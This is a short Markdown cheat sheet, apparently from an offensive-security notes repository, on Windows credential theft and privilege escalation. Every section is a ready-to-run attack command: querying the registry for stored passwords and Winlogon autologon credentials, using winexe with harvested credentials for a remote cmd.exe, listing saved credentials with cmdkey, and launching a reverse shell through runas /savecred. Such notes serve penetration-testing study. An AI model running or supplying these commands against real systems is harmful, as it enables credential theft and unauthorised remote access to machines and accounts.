killchain-compendium/exploit/windows/docs/password_in_registry.md

26 lines
458 B
Markdown
Raw Normal View History

2021-10-16 00:40:15 +02:00
# Password Inside Registry Key
* Query passwords saved inside the registry
```sh
reg query HKLM /f password /t REG_SZ /s
```
* Admin Autologon credentials
```
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
* On attacker, change the credentials on target
```sh
winexe -U 'admin%password' //<target-IP> cmd.exe
```
## List other Creds
```
cmdkey /list
```
* Open reverse shell
```sh
runas /savecred /user:admin C:\shell.exe
```